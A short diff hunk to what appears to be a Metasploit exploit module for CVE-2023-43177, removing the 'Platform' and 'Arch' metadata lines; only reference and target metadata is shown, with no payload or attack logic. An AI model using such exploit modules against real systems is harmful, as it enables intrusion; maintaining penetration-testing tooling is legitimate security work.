@@ -48,9 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2023-43177'],
           [ 'CWE', '913' ]
         ],
-        'Platform' => %w[java unix linux win],
         'Privileged' => true,
-        'Arch' => [ARCH_JAVA, ARCH_X64, ARCH_X86],
         'Targets' => [
           [
             'Java',
